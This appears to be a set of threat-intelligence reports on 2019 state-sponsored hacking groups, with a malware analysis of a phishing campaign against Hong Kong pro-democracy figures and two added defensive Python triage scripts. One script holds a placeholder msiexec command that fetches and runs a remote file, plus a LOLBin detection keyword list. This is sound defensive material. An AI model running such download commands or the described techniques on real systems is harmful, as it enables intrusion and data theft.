Hacking Activity of SectorD Group in 2019

SectorD Group Overview

A total of 15 subgroups of SectorD have been found to date. They perform hacking activities for the purpose of gathering high-quality political and diplomatic information about individuals or countries that oppose the SectorD government. This article presents a summary of the monthly activities of the SectorD Group that were discovered in 2019.

Figure 1 SectorD subgroup activity in 2019

SectorD groups tend to attack geographically close countries and mainly target enterprises, universities, IT companies, research institutes and energy industries. They attach malicious documents to spear phishing emails and exploit known vulnerabilities. Of the 15 groups, the activities of the SectorD02 group were the most prominent this year, followed by the SectorD01 and SectorD12 groups.

Below is a map of the countries that were targeted by the SectorD Group in 2019. The darker the red, the more frequent the attack. This shows that the SectorD Group has conducted frequent hacking activities against their neighboring countries in the Middle East and the United States.

Figure 2 The main target countries for the SectorD Group in 2019

Hacking Activity of SectorD Groups in 2019

The following is a timeline and detailed monthly activity of the SectorD groups hacking activity found in 2019.

Figure 3 Timeline of main activities for the SectorD Group in 2019

January

In January, SectorD targets were in Europe (including Belarus, Ukraine and Sweden), East Asia (including South Korea) and the Middle East (centering on Saudi Arabia, Turkey and Oman). Two hacking groups were found to be active.

Outside the Middle East, their purpose seems to be to steal diplomatic information from countries, such as those in Europe and East Asia, that have political and economic cooperation with countries in the Middle East. In particular, South Korea recently made diplomatic progress by agreeing, through summit talks with Qatar, to cooperate in seven areas.

Hacking techniques used by SectorD continue to include spear phishing with Microsoft Word files containing malicious macros.

Based on their hacking activities so far, it appears that SectorD is starting to expand its scope to countries that have political and economic cooperation with Middle Eastern countries, rather than solely targeting countries in the Middle East.

April

A total of four hacking groups, SectorD01, SectorD02, SectorD05 and SectorD12, were found among the SectorD hacking groups this April. Their hacking activity targeted countries in the Middle East, including SectorD's political competitor Saudi Arabia, the United Arab Emirates, Jordan, Iraq and Turkey, as well as Ukraine, Estonia, Germany, the United States, and South and East Asia.

SectorD hacking groups mostly used spear phishing techniques with malware; example phishing documents were Word files using confidential U.S. State Department forms. At the same time, malware in the form of compressed files abusing the recently discovered WinRAR vulnerability was also found. SectorD hacking groups mainly collected political, military and diplomatic information from countries in the Middle East that are their political competitors.

However, with the recent declaration of noncompliance with some provisions of a nuclear agreement it is party to, hacking aimed at collecting information on government activities is expected to intensify, as conflicts with other countries are expected in many areas, including politics and diplomacy.

May

In May, a total of two hacking groups were found among the SectorD groups. They perform hacking activities mainly against other Middle Eastern countries with which they have political tensions.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information, using spear phishing emails with Microsoft Excel files containing malicious macros, and malware using AutoHotKey and TeamViewer, neither of which they had used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, like most other Sector groups. Recently, they have used open-source penetration testing tools in their attacks, which seems to be an attempt to avoid leaving traces of attack activity.

June

In June, a total of two hacking groups were found among the SectorD groups. They targeted countries in the Middle East with which they have a politically competitive relationship. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively from Middle Asia to the Middle East, mainly in Hong Kong, Sweden, Tajikistan, the United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, the United States and Mexico. SectorD11 group activity was discovered from Middle Asia to the Middle East.

They constantly use spear phishing emails with Microsoft Office document files attached. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilians who oppose the SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This mainly targets the United States, with which they have political and military disputes, but also a pro-American nation in the Middle East. It is likely that the activities of the SectorD hacking groups will depend greatly on how the US exerts its influence and conducts military activities in the future.

August

Among the SectorD groups, the activities of two hacking groups, SectorD02 and SectorD14, were found this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of the SectorD14 group was found in Canada, the United States, the United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities against Industrial Control Systems (ICS) owned by government agencies and by natural gas and oil companies related to countries in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

September

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries which are political rivals with the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), and other hacking targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to the previous cases: sending a Microsoft Word file with a malicious macro to the target as an attachment to a spear phishing email. In addition to these techniques, the SectorD05 group launched attacks against researchers from the United States, the Middle East and France who focus on academic research on SectorD, and performed phishing attacks targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofed sites disguised as user login pages, and performs hacking activities to steal the credentials entered by the targeted individuals.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

October

A total of six hacking groups SectorD01, SectorD02, SectorD05, SectorD10, SectorD11 and SectorD15 were discovered among SectorD groups this October. Hacking activity of the SectorD01 group was found in the United States and Ireland. Hacking activity of the SectorD02 group was found in Lebanon, Ireland, Iraq, South Korea and Canada. Hacking activity of the SectorD05 group was found in the United States and Israel. Hacking activity of the SectorD10 group was found in the United States. Hacking activity of the SectorD11 group was found in France, Saudi Arabia, the United States, Netherlands, Brazil and Russia. Hacking activity of the SectorD15 group was found in Algeria, the United Kingdom, the United Arab Emirates, Saudi Arabia and the United States.

The SectorD01 group modified malware that had DNS tunneling functions first discovered in November 2018 and reused it in this hacking activity.

The SectorD02 group attached a Microsoft Excel file containing a malicious macro to a spear phishing email. After that, the encoded VBS script would be decoded and executed using the legitimate wscript.exe.

The SectorD05 group used social media to post malicious links that redirect to specific websites, or sent SMS messages containing malicious links to individuals opposed to government agencies. Sometimes they used spear phishing emails that included malicious links.

The SectorD10 group was primarily hacking into universities in the United States and used emails containing malicious links that redirect to phishing sites.

The SectorD11 group produced malicious APK files written in Persian and sought to collect information from compromised Android-based smartphones.

The SectorD15 group created malicious websites using an American Gulf War veterans theme. The website, which says it will hire veterans, sends the input information to the attacker’s server.

SectorD groups conducted hacking activities targeting countries that are political rivals of a certain country. The purpose of the recent hacking activities of the SectorD groups is to collect high-level information, such as the political and diplomatic activities of people or nations opposed to a specific government.



The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, October 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from September 21 to October 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA04, SectorA05 and SectorA07, were discovered among the SectorA groups this October. The SectorA01 group's hacking activity was found in areas including the United States, the Philippines, the United Kingdom, Germany, Nigeria, South Korea and India. The SectorA04 group's hacking activity was found in areas including South Korea, the United States, Japan and India. Hacking activity of the SectorA05 group was found in South Korea and Ukraine. Hacking activity of the SectorA07 group was found in South Korea.

The SectorA01 group has hacked into cryptocurrency traders by distributing fake cryptocurrency trading programs to both macOS and Windows operating systems.

The SectorA04 group hacked into an ATM operated by an Indian financial firm. The attack is similar to a past incident in South Korea, and is a hacking activity aimed at stealing card information entered at the hacked ATM and stealing real money.

The SectorA05 group used a Hangul (HWP) file, disguised as an expert advisory request document, that contained the vulnerability. This activity was conducted to collect information related to the SectorA government from academia, universities and research institutes.

Similar to SectorA05 group, SectorA07 group used malware in the form of a Hangul file. The Hangul file used cryptocurrency mining as a theme. It seems that the hacking activity was performed targeting individuals and organizations related to cryptocurrency trading and mining.

The purpose of the hacking activities of the SectorA hacking groups to date is to collect high-quality information about the political and diplomatic activities of South Korea and to steal money from financial organizations all around the world. This purpose has remained the same for a long time and is expected to continue unchanged for the time being.

2. SectorB Activity Features

A total of seven hacking groups, SectorB01, SectorB05, SectorB06, SectorB10, SectorB11, SectorB21 and SectorB22, were discovered among the SectorB groups this October. The hacking activity of the SectorB01 group discovered to date includes North and South America (including the United States and Brazil) and the Middle East (including Turkey, Ukraine and the Russian Federation). It was also found in Europe and in Asia (including Thailand, Singapore, Indonesia and South Korea). The SectorB05 group's hacking activity was found in Vietnam. The SectorB06 group's hacking activity was found targeting the Russian Federation and South Korea. The SectorB11 group's hacking activity was found in the United States, Poland and Vietnam. The SectorB21 group's hacking activity was found in Tibet. The SectorB22 group's hacking activity was found in Asia (including Cambodia, the Philippines, Japan, Malaysia and Vietnam), in Europe (including the United Kingdom, Ukraine and the Russian Federation) and in Central Asia (including Turkmenistan).

The SectorB01 group has focused on using cryptocurrency-related malware, unlike its past hacking purposes and activities. So far it is not clear why the SectorB01 group is using this kind of malware, so its hacking activities are worth watching in the future.

The SectorB05 group used the name of a Russian security company in its electronic signature in its hacking activity targeting Vietnam.

The SectorB06 group has been spreading malware through fake Russian government websites. They targeted officials of Russian government agencies and intended to collect high-level information related to the activities of Russian government agencies.

The SectorB10 group has been targeting South Korean government agencies since 2016.

The SectorB11 group used spear phishing to target individuals related to the Vietnamese government. They attached malicious document files to their emails and used legitimate government documents, such as official guidelines, official documents, press releases and surveys, as decoy files.

The SectorB21 group conducted a hacking campaign against the Tibetan government. They used various vulnerabilities against Windows, Mac and Android operating systems.

The SectorB22 group attached archive files containing shortcut files to spear phishing emails and targeted government agencies.

The purpose of the hacking activities of SectorB groups to date is to collect high-level information such as political and diplomatic activities of government agencies around the world.

3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02 and SectorC04, were discovered among the SectorC groups this October. Hacking activity of the SectorC01 group was found in the United States, Belarus, the United Kingdom, Belgium, Ukraine and Canada. Hacking activity of the SectorC02 group was found in Belarus, the Russian Federation, the United Kingdom, Sweden, Georgia, Bulgaria, Brazil and Italy. Hacking activity of the SectorC04 group was found in Israel, Romania and Moldova.

The SectorC01 group used a spear phishing email with an MS Word file attached. When the document is opened, it downloads a remote template hosted on Dropbox, which in turn downloads and executes a document containing a malicious macro script.

The SectorC02 group lured victims with malware disguised as legitimate software on illegal software download (warez) sites, and monitors the victims' network activity.

The SectorC04 group's hacking campaign targets government agencies handling diplomatic affairs. They used a spear phishing email containing a link; when the link was clicked, an image with malware embedded using steganography was downloaded.

The purpose of the hacking activities of the SectorC groups to date is to collect high-level information such as political and diplomatic activities in countries that are located near to the government agencies supporting SectorC.

4. SectorD Activity Features

A total of six hacking groups SectorD01, SectorD02, SectorD05, SectorD10, SectorD11 and SectorD15 were discovered among SectorD groups this October. Hacking activity of the SectorD01 group was found in the United States and Ireland. Hacking activity of the SectorD02 group was found in Lebanon, Ireland, Iraq, South Korea and Canada. Hacking activity of the SectorD05 group was found in the United States and Israel. Hacking activity of the SectorD10 group was found in the United States. Hacking activity of the SectorD11 group was found in France, Saudi Arabia, the United States, Netherlands, Brazil and Russia. Hacking activity of the SectorD15 group was found in Algeria, the United Kingdom, the United Arab Emirates, Saudi Arabia and the United States.

The SectorD01 group modified malware that had DNS tunneling functions first discovered in November 2018 and reused it in this hacking activity.

The SectorD02 group attached a Microsoft Excel file containing a malicious macro to a spear phishing email. After that, the encoded VBS script would be decoded and executed using the legitimate wscript.exe.

The SectorD05 group used social media to post malicious links that redirect to specific websites, or sent SMS messages containing malicious links to individuals opposed to government agencies. Sometimes they used spear phishing emails that included malicious links.

The SectorD10 group was primarily hacking into universities in the United States and used emails containing malicious links that redirect to phishing sites.

The SectorD11 group produced malicious APK files written in Persian and sought to collect information from compromised Android-based smartphones.

The SectorD15 group created malicious websites using an American Gulf War veterans theme. The website, which says it will hire veterans, sends the input information to the attacker’s server.

SectorD groups conducted hacking activities targeting countries that are political rivals of a certain country. The purpose of the recent hacking activities of the SectorD groups is to collect high-level information, such as the political and diplomatic activities of people or nations opposed to a specific government.

5. SectorE Activity Features

A total of three hacking groups SectorE02, SectorE04 and SectorE05 were discovered among SectorE groups this October. Hacking activity of the SectorE02 group was found in Pakistan and the United Kingdom. Hacking activity of the SectorE04 group was found in Taiwan, France, Russia, Germany, United States, Malaysia and China. Hacking activity of the SectorE05 group was found in China, Japan, Ukraine, Pakistan, the United States, Philippines and United Kingdom.

The SectorE02 group used malware with PDF file icons and the RLO (Right-to-Left Override) filename technique. The malicious code accesses a specific URL to download and execute additional malware.

The SectorE04 group used a malicious document file exploiting the CVE-2017-11882 vulnerability as an attachment to a spear phishing email. Via the vulnerability, it also downloads and runs HTA scripts.

The SectorE05 group used an SFX executable archive file as an attachment to the spear phishing email. Inside the compressed file, malware was embedded along with image files of auto parts produced by a specific Thai company.

Until now, the hacking activities of the SectorE groups are intended to gather high-level information including political, diplomatic and military activities involving the Pakistani government. However, recently they expanded activity to East Asia and other regions, including China, where the share of activities to obtain high-level information on politics, diplomacy and technology of other countries is also increasing.

6. SectorF Activity Features

The SectorF01 group was discovered among SectorF groups this October. Hacking activity of the SectorF01 group was found in Cambodia.

The SectorF01 group used an SFX executable compressed file disguised with an MS Word document icon. The SFX archive contained files with pkg and bin extensions.

The SectorF01 group aims to gather high-level information including political, diplomatic and military activities in countries nearby. They also aim to steal advanced technical information to advance their economic development.

7. SectorH Activity Features

The SectorH01 group was discovered among SectorH groups this October. SectorH01 group’s activity was found in China, Germany, Italy, Japan, Belgium, France, the Czech Republic and the United States.

The SectorH01 group attached malicious MS Excel files to spear phishing emails. The macro script embedded in the document file is configured to run HTA scripts hidden on the attacker’s Blogspot website.

The hacking activities of the SectorH group include hacking for both cyber crime and government support purposes. In particular, as diplomatic friction with neighboring countries continues, activities to gather high-level military and political information from them will also continue.

8. SectorP Activity Features

A total of two hacking groups, SectorP01 and SectorP02 were discovered among the SectorP groups this October. Hacking activity of the SectorP01 group was found in Turkey, United States, Algeria, Kuwait, Syria, India, China and Germany. Hacking activity of the SectorP02 group was found in Canada, Syria, Austria, the United States and Turkey. SectorP group usually directly hacks websites, news media, and Twitter accounts to post images that relate to their political ideology or post criticisms of opposing forces.

The SectorP01 group is conducting hacking against dissidents who oppose political activity of certain governments, usually targeting Windows and Android systems.

The SectorP02 group used social engineering and watering hole techniques to lead their targets to websites that distribute malware. The disseminated Android malware was mainly disguised as an installer for legitimate software.

The hacking activity of the SectorP group was directed against dissidents who oppose the political activity of certain governments. In particular, the proportion of malware that runs on Android smartphones is higher than that of Windows-based malware. This is because internet usage in the country is higher on smartphones than on PCs, and a phone contains more information related to dissidents. These hacking activities are expected to continue in the future.

9. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ03, SectorJ04, SectorJ07 and SectorJ09 groups were discovered this October. Hacking activity of the SectorJ01 group was discovered in the United Kingdom, Russia, United States, United Arab Emirates, China, Romania and Bulgaria. Hacking activity of the SectorJ02 group was found in the Philippines. Hacking activity of the SectorJ03 group was discovered in India, United Arab Emirates and Jordan. Hacking activity of the SectorJ04 group was discovered in Bosnia, the United Kingdom, Slovenia, Canada, Germany, Switzerland, France, Poland, South Korea, Japan, the United States, United Arab Emirates and Spain. Hacking activity of the SectorJ07 group was found in Hong Kong, China, Hungary and Spain. Hacking activity of the SectorJ09 group was found in the Czech Republic and Ukraine.

Unlike most other government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort victims.

The SectorJ01 group includes malicious URLs in the body of spear phishing emails that download MS Word files which are disguised as visa-related documents.

The SectorJ02 group inserted skimmer code into a JavaScript library that an e-commerce service provider supplies to many online stores. When customers paid with credit cards, the skimmer code secretly collected the credit card payment information.

The SectorJ03 group attached MS Word documents containing malicious macro scripts to spear phishing emails. The macro script downloads and executes a Visual Basic script from a specific URL, which then downloads and executes an MSI file from a specific server.

The SectorJ04 group continued using large-scale spam emails and kept their existing characteristics, such as malicious documents with an Office theme. However, they have also started using new malware written in C++ which other researchers have called SDBBot. Its distinguishing feature is the use of an SDB (Shim Database) file to maintain persistence on the infected system.

The SectorJ07 group attacked Linux-based systems using ELF malware in the same manner as their past activities, continuously carrying out cryptomining activities.

Similar to the SectorJ02 group, the SectorJ09 group inserted a skimming script into web pages of several online stores to collect payment and personally identifiable information (PII) each time a credit card payment occurs.



Threat Actor Targeting Hong Kong Pro-Democracy Figures

Introduction

At the end of October, a person deeply involved in the pro-democracy side of the Hong Kong protests received a spear phishing email from someone claiming to be a law student at a top foreign university, requesting feedback on his supposed thesis, which includes recommendations on how to end the Hong Kong unrest. The email contained a link to a ZIP file on Google Drive.

The contents of FYI.zip downloaded from the Google Drive link

The ZIP archive contained three files – an August 2019 policy brief downloaded from Freedom House regarding the Democratic Crisis in Hong Kong, a September 2019 Hong Kong report downloaded from Human Rights First, and a supposed RTF file from the Nikkei Asian Review.

The third file, masquerading as a Nikkei Asian Review document, is actually an LNK shortcut file with a double extension. When LNK files are viewed through archiving software, the double extension “.rtf.lnk” is shown correctly. If the file is extracted and viewed in Windows Explorer, however, the operating system hides the .lnk extension by default.

Analysis of the LNK file shows running it will execute msiexec.exe to download and run a remote MSI file

The LNK file is actually a shortcut to the Windows utility msiexec.exe, which can be used as a LOLBin to download and run remote MSI files, here carrying a PNG extension. In this case, the MSI file is downloaded from a GitHub repository and account created on October 10.
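The two filename tricks described in these reports, the RLO naming technique from the SectorE02 summary above and the “.rtf.lnk” double extension here, plus a shortcut whose command line points a LOLBin at a URL, can all be caught before the archive is ever extracted. The following is an added example, not code from the article or from NSHC: it inspects a ZIP in memory and flags entry names with a right-to-left override character, document extensions followed by .lnk, and LNK content (recognised by the 20-byte Shell Link header) whose embedded strings name msiexec or another LOLBin together with a URL. The archive it builds is constructed for the demonstration; the LNK inside is a stub carrying only the header and a fake command line, not a real shortcut, and the URL and path in it are placeholders.

```python
"""Triage a mail attachment archive for filename tricks and LOLBin shortcuts.

Added example; the archive built by build_sample_zip() is constructed and the
LNK entry is a header-plus-strings stub, not a sample from the article.
"""
import io
import re
import zipfile

# First 20 bytes of every Shell Link file: HeaderSize 0x4C followed by the
# LinkCLSID {00021401-0000-0000-C000-000000000046}.
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
DOCUMENT_EXTS = {"pdf", "doc", "docx", "rtf", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
LOLBINS = ("msiexec", "mshta", "rundll32", "regsvr32", "certutil", "wscript", "cscript", "powershell")


def check_name(name):
    """Findings derived from the archive entry name alone."""
    findings = []
    if RLO in name:
        findings.append("right-to-left override character in filename")
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) >= 3 and parts[-1] == "lnk" and parts[-2] in DOCUMENT_EXTS:
        findings.append("document extension followed by .lnk (double extension)")
    return findings


def check_lnk(data):
    """Findings derived from the content if it is a Shell Link file.

    Shortcut arguments are stored as UTF-16LE strings, so the bytes are decoded
    at both alignments; the latin-1 view additionally catches ANSI path data."""
    if not data.startswith(LNK_MAGIC):
        return []
    findings = ["content is a Shell Link (LNK) file"]
    views = [data.decode("latin-1").lower()]
    for offset in (0, 1):
        views.append(data[offset:].decode("utf-16-le", errors="ignore").lower())
    text = "\n".join(views)
    for binary in LOLBINS:
        if binary in text:
            findings.append(f"command line references {binary}")
    if re.search(r"https?://", text):
        findings.append("command line contains a URL")
    return findings


def triage_zip(zip_bytes):
    """Return {entry name: [findings]} for every file in the archive."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            report[info.filename] = check_name(info.filename) + check_lnk(zf.read(info))
    return report


def build_sample_zip():
    """Constructed archive resembling the one described: two decoy PDFs, a
    double-extension LNK stub and an RLO-named executable. All placeholders."""
    fake_cmd = "msiexec.exe /q /i https://example.invalid/placeholder/siHost64.png"
    lnk_stub = LNK_MAGIC + bytes(0x4C - len(LNK_MAGIC)) + fake_cmd.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("policy_brief_2019-08.pdf", b"%PDF-1.4 constructed placeholder")
        zf.writestr("hk_report_2019-09.pdf", b"%PDF-1.4 constructed placeholder")
        zf.writestr("Nikkei_Asian_Review.rtf.lnk", lnk_stub)
        zf.writestr("invoice" + RLO + "fdp.exe", b"MZ constructed placeholder")  # shows as invoiceexe.pdf
    return buf.getvalue()


if __name__ == "__main__":
    for name, findings in triage_zip(build_sample_zip()).items():
        print(repr(name), "->", findings or "no findings")
```

The content check deliberately keys on the Shell Link header rather than the extension, because the extension is exactly what the attacker controls; the name check is kept separate so that a mismatch between the two (a `.rtf.lnk` name without LNK content, or LNK content under a document name) is visible in the findings.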

A snapshot of the GitHub repository on October 29

siHost64

The MSI file, “siHost64.png”, was created using a registered or cracked EXEMSI program. Running it will drop and run “siHost64.exe” in the %APPDATA% folder. This executable is a PyInstaller executable which has over a thousand files inside it, but the main important file is the compiled python script “siHost64”.

Unpacking the PyInstaller executable shows the real files, some of which cannot be seen when performing dynamic analysis

By restoring the first eight missing bytes of “siHost64” which is typically required for such PyInstaller files, we are then able to decompile the compiled python script and analyze the functionality of this malware:

  • Use the Python requests library to call the Dropbox API, which connects to Dropbox and uses it as an HTTPS C2 server
  • Use the system proxy for communications, if any
  • Add itself to the registry AutoRun location HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the registry name “siHost64”. On October 31, the new version of the malware changed the registry name used to “Dropbox Update Setup”.
  • Perform AES encryption in CBC mode on uploaded files with the key “ApmcJue1570368JnxBdGetr*^#ajLsOw” and a random salt
  • Check in to the C2 server by creating an encrypted file containing the operating system version and architecture, date, computer name, and logged-in user
  • Check for files from the C2 server which contain encrypted arbitrary commands to be run, execute that command, and create a new encrypted file containing the results of the executed command

Example of the malware using the Dropbox API to check in
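The persistence entry in the list above is the one artifact a responder can check on a suspected host without the malware's source. The following is an added example, not code from the article or from NSHC: it parses the text of a `reg export` of the Run keys and flags values that launch an executable from a user-writable location or whose value name is one of the two names the article reports. The .reg text it parses is constructed to resemble export output (a real export is UTF-16 with a BOM and must be decoded first); the user name and the OneDrive and RunOnce entries are placeholders included to show what is and is not flagged.

```python
"""Review Run-key entries from a .reg export for user-writable persistence.

Added example. SAMPLE_REG_EXPORT is constructed to look like `reg export`
output; the "victim" user and the benign entries are placeholders.
"""
import re

# Locations a standard user can write to. Legitimate software installs here
# too, so a hit is a triage signal rather than a verdict.
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%",
                 "\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
# Value names the article reports for the two versions of this malware.
WATCHLIST = {"sihost64", "dropbox update setup"}

SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"siHost64"="\"C:\\Users\\victim\\AppData\\Roaming\\siHost64.exe\""
"Dropbox Update Setup"="C:\\Users\\victim\\AppData\\Roaming\\DropboxUpdate.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\Windows\\System32\\cmd.exe /c del C:\\Users\\victim\\AppData\\Local\\Temp\\x.tmp"
'''


def parse_reg_export(text):
    """Return {key path: {value name: data}} for string values in a .reg text.

    .reg files escape backslashes and quotes inside string data with a
    backslash; that escaping is undone here. Non-string values (hex:, dword:)
    are kept verbatim."""
    result = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
        elif current and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip('"')
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = re.sub(r"\\(.)", r"\1", data[1:-1])
            result[current][name] = data
    return result


def executable_of(command):
    """Return the program part of a command line: the quoted token if the
    command starts with a quote, otherwise the first whitespace-separated token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def flag_run_entries(reg):
    """Return (key, value name, executable, reasons) for suspicious Run/RunOnce values."""
    findings = []
    for key, values in reg.items():
        if not key.lower().endswith(("\\run", "\\runonce")):
            continue
        for name, command in values.items():
            exe = executable_of(command)
            reasons = []
            if any(marker in exe.lower() for marker in USER_WRITABLE):
                reasons.append("executable lives in a user-writable directory")
            if name.lower() in WATCHLIST:
                reasons.append("value name on watchlist")
            if reasons:
                findings.append((key, name, exe, reasons))
    return findings


if __name__ == "__main__":
    for key, name, exe, reasons in flag_run_entries(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{key}\\{name}: {exe} ({'; '.join(reasons)})")
```

Only the program path is tested against the user-writable list, not the whole command line; the constructed RunOnce entry shows why, since a System32 binary that merely mentions a Temp path in its arguments should not trip a persistence check.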

Based on the check in information from infected machines, it appears that there is a single infected Hong Kong victim of interest to this threat actor connecting to the Dropbox app besides the target we described at the start. The files exfiltrated from this victim appeared to be personal documents related to the victim traveling to the United States, business forms, and Christian hymns.

Besides those exfiltrated documents, the C2 server also appeared to host next-stage malware, such as two files named “GetCurrentRollback.exe” and “GetCurrentDeploy.dll”. “GetCurrentRollback.exe” is a signed Microsoft executable that seems to be used for upgrading a previous Windows version to Windows 10, and “GetCurrentDeploy.dll” is likely the name of the DLL that is side-loaded by it. The earliest version of “GetCurrentRollback.exe” we could find dates from 2016 and the latest from November 2019, which at first glance means all versions may be exploitable by DLL sideloading.

A version of GetCurrentRollback.exe signed on November 13, 2019 is still vulnerable to DLL Sideloading

Conclusion

Based on the victim profile and the exfiltrated files, it appears that one of the threat actor's intelligence requirements is to monitor people connected to the Hong Kong protests, targeting either them or the people around them. There are multiple possible motives for this requirement, the most likely being to understand the inner thinking of the pro-democracy movement, or to support or undermine the movement behind the scenes.

Using Dropbox and other legitimate services such as Google Drive and GitHub throughout the attack life cycle is not a new concept for threat actors, and it allows them to bypass network detection easily. To counter this threat, enterprises, or teams within enterprises, nowadays block or detect such Shadow IT services if they are not in official use, but individual or non-enterprise users who may be targeted by state-sponsored threat actors rarely have this luxury.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1192 Spearphishing Link

Execution

T1204 User Execution
T1218 Signed Binary Proxy Execution
T1064 Scripting

Persistence

T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1036 Masquerading
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1218 Signed Binary Proxy Execution
T1102 Web Service

Discovery

T1083 File and Directory Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
T1124 System Time Discovery

Collection

T1005 Data from Local System

Command and Control

T1043 Commonly Used Port
T1132 Data Encoding
T1071 Standard Application Layer Protocol
T1032 Standard Cryptographic Protocol
T1102 Web Service

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

Monthly Threat Actor Group Intelligence Report, September 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from August 21 to September 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, and SectorA07, were found among SectorA hacking groups this September.

The parallel requirements of the SectorA hacking groups, which continue to date, are both to collect high-quality information on government activities such as political and diplomatic matters related to South Korea or to SectorA relief organizations, and to profit illegally from crimes around the world. These purposes have been pursued for a long time and, being strategic, are expected to continue without change for the time being.

The hacking activities of the SectorA01, SectorA05 and SectorA07 groups discovered in September were related to collecting high-level information such as political and diplomatic activities related to South Korea.

SectorA01 group activity was found in South Korea, Germany, the United States, China, and Austria, and used malware in the form of Hangul (HWP) files, a document format widely used by South Korean government agencies.

SectorA05 group activity was found in the United States, South Korea, Peru, Belgium, France, China, Japan, the United Kingdom, Slovakia, Russia and Poland. The hacking technique used by the group was spear phishing emails delivering malware in the form of Microsoft Word files to the target. The lure documents had topics related to SectorA’s economic sanctions, nuclear development, and submarines.

SectorA07 group activity was found in South Korea, Italy, Vietnam, Japan, and Brazil. During that time, the attacker used a Windows executable file with a file name associated with a MOU contract with the Department of Defense. The file was disguised using the icon of Microsoft Word.

2. SectorB Activity Features

A total of eight hacking groups, SectorB01, SectorB03, SectorB09, SectorB11, SectorB14, SectorB19, SectorB20, and SectorB21, were found among SectorB hacking groups this September.

The hacking activities of the SectorB groups discovered to date have been found in Southeast Asia (including Thailand, Singapore, Indonesia, Philippines, Vietnam, Malaysia and India), the Middle East (including Turkey), East Asia (including Taiwan, Macau, Hong Kong, Japan and South Korea), North America (including the United States), and Europe (including the United Kingdom and Russia). In addition, hacking activity was discovered in the Uyghur region, which we believe was targeted for political purposes.

The SectorB hacking groups use spear phishing emails with attached document files that exploit N-day vulnerabilities in Microsoft Office. This method of intrusion is common for them when targeting developing countries, such as those in Southeast Asia.

In addition, the SectorB21 group performed hacking activities using Android malware to steal high-level information from smartphones of specific people in the Uyghur region.

